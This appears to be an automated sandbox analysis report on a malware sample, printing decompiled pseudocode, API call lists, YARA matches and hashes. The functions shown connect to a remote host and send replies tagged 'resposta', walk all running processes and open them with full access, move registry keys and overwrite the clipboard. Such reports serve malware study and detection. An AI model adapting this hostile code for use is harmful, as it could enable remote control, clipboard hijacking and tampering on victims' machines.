				_push(_v33136);
				_push(0x2403b060);
				E240133FC();
				E24038F28(_v20, _t92, _v33132, _t110, _t112, _t119);
				Sleep(0x3e8);
				_push(_t114);
				_push(0x2403afad);
				_push( *[fs:edx]);
				 *[fs:edx] = _t116;
				_t58 =  *0x2405ac0c; // 0x2405700c
				 *_t58 = 0;
				E240119B8( &_v352, _v12, _t119);
				E24011428(E24011FF8());
				if(_a12 != 0) {
					if(__eflags > 0) {
						goto L10;
					}
				} else {
					_t121 = _a8;
					if(_a8 > 0) {
						L10:
						E24011428(E24012020( &_v352, _a8));
						L12:
						L12:
						if(E24011428(E24011C00( &_v352, _t121)) != 0 ||  *((char*)(_v20 + 0x10)) == 0) {
							_t67 = 0;
						} else {
							_t67 = 1;
						}
						if(_t67 == 1) {
							goto L11;
						}
						_pop(_t107);
						 *[fs:eax] = _t107;
						_push(0x2403afb4);
						return E24011428(E24011B50( &_v352));
						L11:
						Sleep(1);
						E24011428(E24011B10( &_v16));
						E24022CEC(_v20, _v16,  &_v33121);
					}
				}
				goto L12;
			}























                                    0x2403adc0
                                    0x2403adc0
                                    0x2403adc1
                                    0x2403adc3
                                    0x2403adc4
                                    0x2403adc9
                                    0x2403adc9
                                    0x2403adcf
                                    0x2403add0
                                    0x2403add0
                                    0x2403add6
                                    0x2403adde
                                    0x2403ade1
                                    0x2403ade7
                                    0x2403aded
                                    0x2403adf3
                                    0x2403adf6
                                    0x2403adf9
                                    0x2403adfe
                                    0x2403ae06
                                    0x2403ae0d
                                    0x2403ae0e
                                    0x2403ae13
                                    0x2403ae16
                                    0x2403ae19
                                    0x2403ae27
                                    0x2403ae5a
                                    0x2403ae63
                                    0x2403ae66
                                    0x2403ae34
                                    0x2403ae3f
                                    0x2403ae47
                                    0x2403ae4c
                                    0x2403ae4d
                                    0x2403ae54
                                    0x2403ae59
                                    0x2403ae59
                                    0x00000000
                                    0x2403ae59
                                    0x00000000
                                    0x2403ae66
                                    0x2403ae68
                                    0x2403ae6d
                                    0x2403ae6f
                                    0x2403ae74
                                    0x2403ae79
                                    0x2403ae7e
                                    0x2403ae83
                                    0x2403ae85
                                    0x2403ae8a
                                    0x2403ae99
                                    0x2403ae9e
                                    0x2403aea4
                                    0x2403aeb4
                                    0x2403aec2
                                    0x2403aecc
                                    0x2403aed3
                                    0x2403aed4
                                    0x2403aed9
                                    0x2403aedc
                                    0x2403aedf
                                    0x2403aee4
                                    0x2403aef0
                                    0x2403af05
                                    0x2403af0e
                                    0x2403af18
                                    0x00000000
                                    0x00000000
                                    0x2403af10
                                    0x2403af10
                                    0x2403af14
                                    0x2403af1a
                                    0x2403af2a
                                    0x00000000
                                    0x2403af68
                                    0x2403af7a
                                    0x2403af85
                                    0x2403af89
                                    0x2403af89
                                    0x2403af89
                                    0x2403af8d
                                    0x00000000
                                    0x00000000
                                    0x2403af91
                                    0x2403af94
                                    0x2403af97
                                    0x2403afac
                                    0x2403af31
                                    0x2403af33
                                    0x2403af52
                                    0x2403af63
                                    0x2403af63
                                    0x2403af14
                                    0x00000000

                                    APIs
                                    • Sleep.KERNEL32(000003E8,2403B060,?,?,?,?,2403B060,2405B98C,2403B060,resposta,|Y|,2405B8DC,00000000,2403B027), ref: 2403AECC
                                      • Part of subcall function 24022B24: getpeername.WS2_32(?,?), ref: 24022B3B
                                      • Part of subcall function 24022B24: inet_ntoa.WS2_32(?), ref: 24022B44
                                      • Part of subcall function 24022B58: getpeername.WS2_32(?,?), ref: 24022B6C
                                      • Part of subcall function 24022B58: htons.WS2_32(?), ref: 24022B77
                                      • Part of subcall function 24022908: socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                      • Part of subcall function 24022908: htons.WS2_32(?), ref: 24022968
                                      • Part of subcall function 24022908: inet_addr.WS2_32(00000000), ref: 24022975
                                      • Part of subcall function 24022908: gethostbyname.WS2_32(00000000), ref: 240229A2
                                      • Part of subcall function 24022908: connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    • Sleep.KERNEL32(0000000A,00000000,2403B027), ref: 2403AE54
                                    • Sleep.KERNEL32(00000001,00000000,2403AFAD,?,000003E8,2403B060,?,?,?,?,2403B060,2405B98C,2403B060,resposta,|Y|,2405B8DC), ref: 2403AF33
                                      • Part of subcall function 24022CEC: send.WSOCK32(?,00000000,00000000,00000000,00000000,?,24022D4C,?,?,24038FD9,24039060,24039054,?,00000000,?,00000000), ref: 24022CF8
                                      • Part of subcall function 24022CEC: WSAGetLastError.WS2_32(?,00000000,00000000,00000000,00000000,?,24022D4C,?,?,24038FD9,24039060,24039054,?,00000000,?,00000000), ref: 24022D04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$getpeernamehtons$ErrorLastconnectgethostbynameinet_addrinet_ntoasendsocket
                                    • String ID: resposta$|Y|
                                    • API String ID: 3039588340-3743483372
                                    • Opcode ID: 51112f6189846ce56c8f689ac25b3f33adf8a00fa7b829192b95b24f2d56059a
                                    • Instruction ID: bea7750fd3e4f4aa172b81ee9d62e3105a374173d7c41863c6d3f5e7b91c26ec
                                    • Opcode Fuzzy Hash: 51112f6189846ce56c8f689ac25b3f33adf8a00fa7b829192b95b24f2d56059a
                                    • Instruction Fuzzy Hash: 44515C70A002189FEB12DF95DC80A8EBFF9FF59308F5084A5F448AA254DB349ED59F51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24022908, Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E24022908(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v20;
				short _v22;
				char _v24;
				short _t29;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr _t41;
				void* _t46;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t67;

				_t67 = __eflags;
				_t64 = _t65;
				_t66 = _t65 + 0xffffffec;
				_push(__edi);
				_t61 = __ecx;
				_v8 = __edx;
				_t46 = __eax;
				E24013524(_v8);
				_push(_t64);
				_push(0x24022a1b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				E24022A38(_t46, _t46, 0x24022a34, __edi, __ecx, _t67);
				_push(_t64);
				_push(0x24022987);
				_push( *[fs:eax]);
				 *[fs:eax] = _t66;
				_t29 = E24013534(_v8);
				 *((intOrPtr*)(_t46 + 4)) = _t29;
				_push(6);
				_push(1);
				_push(2);
				L240225D0();
				 *((intOrPtr*)(_t46 + 0x14)) = _t29;
				_v24 = 2;
				_push(_t61);
				L24022588();
				_v22 = _t29;
				_t30 =  *((intOrPtr*)(_t46 + 4));
				L24022590();
				_v20 = _t30;
				_t56 = _t30;
				 *[fs:eax] = _t56;
				if(_v20 != 0xffffffff) {
					L4:
					_push(_t64);
					_push(0x240229de);
					_push( *[fs:eax]);
					 *[fs:eax] = _t66;
					_push(0x10);
					_push( &_v24);
					_t34 =  *((intOrPtr*)(_t46 + 0x14));
					L24022570();
					_t62 = _t34;
					_t57 = _t34;
					 *[fs:eax] = _t57;
					if(_t62 >= 0) {
						 *(_t46 + 0x10) = 1;
					} else {
						 *(_t46 + 0x10) = 0;
					}
					 *(_t46 + 0x11) =  *(_t46 + 0x10) ^ 0x00000001;
				} else {
					_t41 =  *((intOrPtr*)(_t46 + 4));
					_push(_t41);
					L240225E0();
					if(_t41 != 0) {
						_v20 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0xc))))));
						goto L4;
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(0x24022a22);
				return E24013088( &_v8);
			}





















                                    0x24022908
                                    0x24022909
                                    0x2402290b
                                    0x24022910
                                    0x24022911
                                    0x24022913
                                    0x24022916
                                    0x2402291b
                                    0x24022922
                                    0x24022923
                                    0x24022928
                                    0x2402292b
                                    0x24022935
                                    0x2402293c
                                    0x2402293d
                                    0x24022942
                                    0x24022945
                                    0x2402294b
                                    0x24022950
                                    0x24022953
                                    0x24022955
                                    0x24022957
                                    0x24022959
                                    0x2402295e
                                    0x24022961
                                    0x24022967
                                    0x24022968
                                    0x2402296d
                                    0x24022971
                                    0x24022975
                                    0x2402297a
                                    0x2402297f
                                    0x24022982
                                    0x2402299c
                                    0x240229b5
                                    0x240229b7
                                    0x240229b8
                                    0x240229bd
                                    0x240229c0
                                    0x240229c3
                                    0x240229c8
                                    0x240229c9
                                    0x240229cd
                                    0x240229d2
                                    0x240229d6
                                    0x240229d9
                                    0x240229f1
                                    0x240229f9
                                    0x240229f3
                                    0x240229f3
                                    0x240229f3
                                    0x24022a02
                                    0x2402299e
                                    0x2402299e
                                    0x240229a1
                                    0x240229a2
                                    0x240229a9
                                    0x240229b2
                                    0x00000000
                                    0x240229b2
                                    0x240229a9
                                    0x24022a07
                                    0x24022a0a
                                    0x24022a0d
                                    0x24022a1a

                                    APIs
                                      • Part of subcall function 24022A38: shutdown.WS2_32(?,00000002), ref: 24022A83
                                      • Part of subcall function 24022A38: closesocket.WS2_32(?), ref: 24022AB1
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                    • htons.WS2_32(?), ref: 24022968
                                    • inet_addr.WS2_32(00000000), ref: 24022975
                                    • gethostbyname.WS2_32(00000000), ref: 240229A2
                                    • connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketconnectgethostbynamehtonsinet_addrshutdownsocket
                                    • String ID:
                                    • API String ID: 1626636048-0
                                    • Opcode ID: ea3ef0b9c5b1ddf9c85e1f6295dee03a8b296f79e9d950188d0a1a864e23e963
                                    • Instruction ID: 8e6301627d0eba413e0a06bb046a4c1ab87b9936023ad13f76e3c78a901c4251
                                    • Opcode Fuzzy Hash: ea3ef0b9c5b1ddf9c85e1f6295dee03a8b296f79e9d950188d0a1a864e23e963
                                    • Instruction Fuzzy Hash: 8A31E230504B54EFEB11CFA4D860A5BBBE8EF0D314B4248A9E800DF685E774DA90CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24055DD4, Relevance: 7.6, APIs: 5, Instructions: 66sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E24055DD4() {
				char _v8;
				char _v12;
				char _v308;
				void* _t28;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr* _t44;
				void* _t45;
				void* _t46;
				intOrPtr _t47;

				_v8 = 0;
				_v12 = 0;
				_t44 =  &_v308;
				_push(_t46);
				_push(0x24055eb7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				while(1) {
					E24013120( &_v8, _v12);
					E24013088( &_v12);
					_t45 = E240157E0(0xf, 0);
					 *_t44 = 0x128;
					E24015800(_t45, _t44);
					do {
						_t36 = OpenProcess(0x1f0fff, 0,  *(_t44 + 8));
						if(_t36 != 0) {
							_t28 = E24055CF4( *(_t44 + 8), _t36, _t37, _t46);
							_pop(_t38);
							if(_t28 == 0 && GetCurrentProcessId() !=  *(_t44 + 8)) {
								_t32 =  *0x2405ab6c; // 0x2405b968
								E240547C8(_t36, _t36, _t38, E24013588(_t32), _t44, _t45);
							}
							E24055D68( *(_t44 + 8), _t36, _t46);
							_pop(_t37);
						}
						CloseHandle(_t36);
					} while (E24015820(_t45, _t44) != 0);
					CloseHandle(_t45);
					Sleep(0x64);
				}
			}















                                    0x24055de2
                                    0x24055de5
                                    0x24055de8
                                    0x24055df0
                                    0x24055df1
                                    0x24055df6
                                    0x24055df9
                                    0x24055dfc
                                    0x24055e02
                                    0x24055e0a
                                    0x24055e1b
                                    0x24055e1d
                                    0x24055e27
                                    0x24055e2c
                                    0x24055e3c
                                    0x24055e40
                                    0x24055e46
                                    0x24055e4b
                                    0x24055e4e
                                    0x24055e5a
                                    0x24055e68
                                    0x24055e68
                                    0x24055e71
                                    0x24055e76
                                    0x24055e76
                                    0x24055e78
                                    0x24055e86
                                    0x24055e8b
                                    0x24055e92
                                    0x24055e92

                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E37
                                    • GetCurrentProcessId.KERNEL32(001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E50
                                    • CloseHandle.KERNEL32(00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E78
                                    • CloseHandle.KERNEL32(00000000,00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E8B
                                    • Sleep.KERNEL32(00000064,00000000,00000000,001F0FFF,00000000,?,00000000,24055EB7), ref: 24055E92
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcess$CurrentOpenSleep
                                    • String ID:
                                    • API String ID: 4261582699-0
                                    • Opcode ID: 9929b0032c801469f5b6af0c31c36f4a8a7653f2113dd8b91e2817a621e74f76
                                    • Instruction ID: c4089e7b3f87a5e07cdd465348963ce968e967bd053b07ea7c575cf46cb06823
                                    • Opcode Fuzzy Hash: 9929b0032c801469f5b6af0c31c36f4a8a7653f2113dd8b91e2817a621e74f76
                                    • Instruction Fuzzy Hash: C911B2306006056BF7019B69DC80A4FBBEDEF65604F500570A808E7669EF70AEC286A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24037D20, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 61sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 35%
                                    			E24037D20() {
				char _v8;
				intOrPtr _v12;
				intOrPtr _t31;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;

				_push(0);
				_push(0);
				_push(_t35);
				_push(_t34);
				_push(0x24037e17);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E24013120( &_v8,  *0x2405ca48);
				E24013088(0x2405ca48);
				E24022908(_t12, E24012658(1),  *0x2405ca3c,  *0x2405ca38, _t34, _t35, _t38);
				Sleep(0xa);
				_t39 = _v8;
				if(_v8 != 0) {
					_push( *0x2405ca40);
					_push("|Y|");
					_push("resposta");
					_push(0x24037e50);
					_push( *0x2405ca34);
					_push(0x24037e50);
					_push(_v8);
					E240133FC();
					E24038F28(_t23, _t23, _v12, _t34, _t35, _t39);
				}
				Sleep(0x3e8);
				_push(_t36);
				_push(0x24037de6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t37;
				E24022A38(_t23, _t23, 0x24037e5c, _t34, _t35, _t39);
				_pop(_t31);
				 *[fs:eax] = _t31;
				L3:
				Sleep(0xea60);
				goto L3;
			}










                                    0x24037d23
                                    0x24037d25
                                    0x24037d28
                                    0x24037d29
                                    0x24037d2d
                                    0x24037d32
                                    0x24037d35
                                    0x24037d41
                                    0x24037d4b
                                    0x24037d6c
                                    0x24037d73
                                    0x24037d78
                                    0x24037d7c
                                    0x24037d7e
                                    0x24037d84
                                    0x24037d89
                                    0x24037d8e
                                    0x24037d93
                                    0x24037d99
                                    0x24037d9e
                                    0x24037da9
                                    0x24037db3
                                    0x24037db3
                                    0x24037dbd
                                    0x24037dc4
                                    0x24037dc5
                                    0x24037dca
                                    0x24037dcd
                                    0x24037dd7
                                    0x24037dde
                                    0x24037de1
                                    0x24037df0
                                    0x24037df5
                                    0x00000000

                                    APIs
                                      • Part of subcall function 24022908: socket.WS2_32(00000002,00000001,00000006), ref: 24022959
                                      • Part of subcall function 24022908: htons.WS2_32(?), ref: 24022968
                                      • Part of subcall function 24022908: inet_addr.WS2_32(00000000), ref: 24022975
                                      • Part of subcall function 24022908: gethostbyname.WS2_32(00000000), ref: 240229A2
                                      • Part of subcall function 24022908: connect.WS2_32(00000002,00000002,00000010), ref: 240229CD
                                    • Sleep.KERNEL32(0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037D73
                                    • Sleep.KERNEL32(000003E8,0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037DBD
                                    • Sleep.KERNEL32(0000EA60,000003E8,0000000A,00000000,24037E17,?,?,?,?,00000000,00000000), ref: 24037DF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$connectgethostbynamehtonsinet_addrsocket
                                    • String ID: resposta$|Y|
                                    • API String ID: 1101491793-3743483372
                                    • Opcode ID: e29a52bf325f5ec422a2037ef2ca2f2cfac8facc2424b06c65ecf119012e470c
                                    • Instruction ID: 46af02bde1e37943a9351d421e33d8f687e8ddacd249fb51c4fc2043ee63e6e1
                                    • Opcode Fuzzy Hash: e29a52bf325f5ec422a2037ef2ca2f2cfac8facc2424b06c65ecf119012e470c
                                    • Instruction Fuzzy Hash: 5C119030304648BBEB029BA9DCA0F1E7FA9E75D60CF608465F904A7698C578BEC09A51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402BFE4, Relevance: 7.6, APIs: 5, Instructions: 58registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 71%
                                    			E2402BFE4(void* __eax, void* __ebx, char __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				void* _v20;
				long _t30;
				void* _t39;
				intOrPtr _t44;
				char* _t49;
				void* _t52;

				_v12 = __ecx;
				_v8 = __edx;
				_t39 = __eax;
				E24013524(_v8);
				E24013524(_v12);
				_push(_t52);
				_push(0x2402c081);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffff0;
				_t49 = E24013534(_v8);
				if(RegOpenKeyA(_t39, _t49,  &_v16) == 0) {
					_t30 = RegCreateKeyA(_t39, E24013534(_v12),  &_v20);
					_t56 = _t30;
					if(_t30 == 0) {
						E2402BDD4(_v16, _t39, _v20, __edi, _t49, _t56);
					}
					RegCloseKey(_v16);
					RegCloseKey(_v20);
					RegDeleteKeyA(_t39, _t49);
				}
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(0x2402c088);
				return E240130AC( &_v12, 2);
			}












                                    0x2402bfec
                                    0x2402bfef
                                    0x2402bff2
                                    0x2402bff7
                                    0x2402bfff
                                    0x2402c006
                                    0x2402c007
                                    0x2402c00c
                                    0x2402c00f
                                    0x2402c01e
                                    0x2402c029
                                    0x2402c039
                                    0x2402c03e
                                    0x2402c040
                                    0x2402c048
                                    0x2402c048
                                    0x2402c051
                                    0x2402c05a
                                    0x2402c061
                                    0x2402c061
                                    0x2402c068
                                    0x2402c06b
                                    0x2402c06e
                                    0x2402c080

                                    APIs
                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 2402C022
                                    • RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402C039
                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,00000000,2402C081), ref: 2402C051
                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,2402C081), ref: 2402C05A
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402C061
                                      • Part of subcall function 2402BDD4: RegEnumValueA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43,?,00000000,2402BF60), ref: 2402BE4E
                                      • Part of subcall function 2402BDD4: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000,00000000,2402BF43), ref: 2402BE74
                                      • Part of subcall function 2402BDD4: RegDeleteValueA.ADVAPI32(?,00000000,?,00000000,00000000,?,?,00002000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BE85
                                      • Part of subcall function 2402BDD4: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,00000200,00000000,?,00002000,00000000,?,00000000,00000000,00000200,00000000,?,?,00002000), ref: 2402BEB9
                                      • Part of subcall function 2402BDD4: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 2402BED5
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCreateDeleteEnum$Open
                                    • String ID:
                                    • API String ID: 3917402359-0
                                    • Opcode ID: 3847444bdcd780156d4e614cf2cc65c7fa208097f743836a4498f3d3338719a9
                                    • Instruction ID: 834d3c274e24900812e860d865bb6421dec51c6eacfb8db9c79b4ce291afdb1d
                                    • Opcode Fuzzy Hash: 3847444bdcd780156d4e614cf2cc65c7fa208097f743836a4498f3d3338719a9
                                    • Instruction Fuzzy Hash: 9A115EB1904608AFEB11DBB4DDC0EAFBBFCEF18244B504560B408E3254E634AE808A20
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403CFC8, Relevance: 7.6, APIs: 5, Instructions: 54clipboardmemoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 45%
                                    			E2403CFC8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				void* _v8;
				void* __ecx;
				intOrPtr _t29;
				void* _t33;
				intOrPtr _t35;
				intOrPtr _t36;

				_t35 = _t36;
				_t33 = __eax;
				_t23 = E2401333C(__eax);
				OpenClipboard(0);
				_push(_t35);
				_push(0x2403d092);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				_v8 = GlobalAlloc(0x2002, _t7);
				_push(_t35);
				_push(0x2403d067);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				_t12 = _v8;
				GlobalFix(_v8);
				_push(_t35);
				_push(0x2403d056);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E24011494(E24013534(_t33), _t23, _t12);
				SetClipboardData(1, _v8);
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(0x2403d05d);
				return GlobalUnWire(_v8);
			}









                                    0x2403cfc9
                                    0x2403cfcf
                                    0x2403cfd8
                                    0x2403cfdc
                                    0x2403cfe3
                                    0x2403cfe4
                                    0x2403cfe9
                                    0x2403cfec
                                    0x2403cffa
                                    0x2403cfff
                                    0x2403d000
                                    0x2403d005
                                    0x2403d008
                                    0x2403d00b
                                    0x2403d00f
                                    0x2403d018
                                    0x2403d019
                                    0x2403d01e
                                    0x2403d021
                                    0x2403d02f
                                    0x2403d03a
                                    0x2403d041
                                    0x2403d044
                                    0x2403d047
                                    0x2403d055

                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 2403CFDC
                                    • GlobalAlloc.KERNEL32(00002002,00000000,00000000,2403D092,?,00000000), ref: 2403CFF5
                                    • GlobalFix.KERNEL32(?), ref: 2403D00F
                                    • SetClipboardData.USER32(00000001,?), ref: 2403D03A
                                    • GlobalUnWire.KERNEL32(?), ref: 2403D050
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Global$Clipboard$AllocDataOpenWire
                                    • String ID:
                                    • API String ID: 3185678922-0
                                    • Opcode ID: 2e6b4804b7f4240e95b2f524206a62390b914c6f8c95fe742b134c5cd911f968
                                    • Instruction ID: 98f45dbb81f7d453bc78d2fc35bb422784256c696a16146a8a119f9aafd29b36
                                    • Opcode Fuzzy Hash: 2e6b4804b7f4240e95b2f524206a62390b914c6f8c95fe742b134c5cd911f968
                                    • Instruction Fuzzy Hash: AA01B171600644BFFB129FB59C71E2EBEADDB5EA44F820860F908C7604D5759E51C960
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2402E4F8, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 276COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 56%
                                    			E2402E4F8(char __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				signed int _t159;
				intOrPtr _t236;
				intOrPtr _t237;
				void* _t238;
				void* _t239;
				void* _t240;
				intOrPtr _t254;
				intOrPtr _t260;
				signed int _t289;
				signed int _t290;
				void* _t294;
				intOrPtr* _t296;
				intOrPtr _t299;
				intOrPtr _t300;

				_t299 = _t300;
				_t240 = 0x11;
				do {
					_push(0);
					_push(0);
					_t240 = _t240 - 1;
				} while (_t240 != 0);
				_push(_t240);
				_t296 = __edx;
				_v5 = __eax;
				_push(_t299);
				_push(0x2402e8b6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t300;
				E240158BC( &_v88, _t240, 0, GetCurrentProcessId(), 0);
				E24013388(_t296, 0x2402e8d0, _v88);
				_t236 =  *((intOrPtr*)( *0x2405c9ac));
				if(_t236 >= 0) {
					_t239 = _t236 + 1;
					_t290 = 0;
					do {
						memcpy( &_v72,  *0x2405c9ac + 4 + (_t290 + _t290 * 2) * 8, 6 << 2);
						_t300 = _t300 + 0xc;
						_t294 = _t290;
						_t296 = _t296;
						E24013120( &_v12, 0x2402e8dc);
						_t304 = _v5;
						if(_v5 != 0) {
							E2402E040(_v68, _t239,  &_v100, __eflags);
							E24013304( &_v96, _v100);
							E2402DD70(_v96, 0,  &_v16, __eflags);
						} else {
							E2402E040(_v68, _t239,  &_v92, _t304);
							E24013304( &_v16, _v92);
						}
						_v24 = E2402E11C(_v64);
						_t305 = _v5;
						if(_v5 != 0) {
							E2402E040(_v60, _t239,  &_v112, __eflags);
							E24013304( &_v108, _v112);
							E2402DD70(_v108, 0,  &_v20, __eflags);
						} else {
							E2402E040(_v60, _t239,  &_v104, _t305);
							E24013304( &_v20, _v104);
						}
						_v28 = E2402E11C(_v56);
						_t250 =  &_v40;
						E2402E448(_v52, _t239,  &_v40, "Unknown", _t294, _t296, _t305);
						_v48 = _v52;
						if(_v72 == 0 || _v72 > 0xc) {
							_t281 = 0x2402e8f8;
							E24013120( &_v44, 0x2402e8f8);
						} else {
							_t281 =  *((intOrPtr*)(0x240572c8 + _v72 * 4));
							E24013120( &_v44,  *((intOrPtr*)(0x240572c8 + _v72 * 4)));
						}
						_push( *_t296);
						_push(_v12);
						_push(0x2402e8d0);
						_push(_v16);
						_push(0x2402e8d0);
						asm("cdq");
						E240158BC( &_v116, _t250, _t281, _v24, _t281);
						_push(_v116);
						_push(0x2402e8d0);
						_push(_v20);
						_push(0x2402e8d0);
						asm("cdq");
						E240158BC( &_v120, _t250, _t281, _v28, _t281);
						_push(_v120);
						_push(0x2402e8d0);
						_push(_v44);
						_push(0x2402e8d0);
						asm("cdq");
						E240158BC( &_v124, _t250, _t281, _v48, _t281);
						_push(_v124);
						_push(0x2402e8d0);
						_push(_v40);
						_push(0x2402e8d0);
						_push(0x2402e904);
						E240133FC();
						_t290 = _t294 + 1;
						_t239 = _t239 - 1;
					} while (_t239 != 0);
				}
				_t237 =  *((intOrPtr*)( *0x2405c9b0));
				if(_t237 >= 0) {
					_t238 = _t237 + 1;
					_t289 = 0;
					do {
						_t159 = _t289 + _t289 * 2;
						_t260 =  *0x2405c9b0;
						_v84 =  *((intOrPtr*)(_t260 + 4 + _t159 * 4));
						_v80 =  *((intOrPtr*)(_t260 + 8 + _t159 * 4));
						_t246 =  *((intOrPtr*)(_t260 + 0xc + _t159 * 4));
						_v76 =  *((intOrPtr*)(_t260 + 0xc + _t159 * 4));
						E24013120( &_v12, 0x2402e910);
						_t311 = _v5;
						if(_v5 != 0) {
							E2402E040(_v84, _t238,  &_v136, __eflags);
							E24013304( &_v132, _v136);
							E2402DD70(_v132, _t246,  &_v16, __eflags);
						} else {
							E2402E040(_v84, _t238,  &_v128, _t311);
							E24013304( &_v16, _v128);
						}
						_v24 = E2402E11C(_v80);
						E24013120( &_v32, 0x2402e91c);
						E24013120( &_v36, 0x2402e91c);
						E2402E448(_v76, _t238,  &_v40, "Unknown", _t289, _t296, _t311);
						_v48 = _v76;
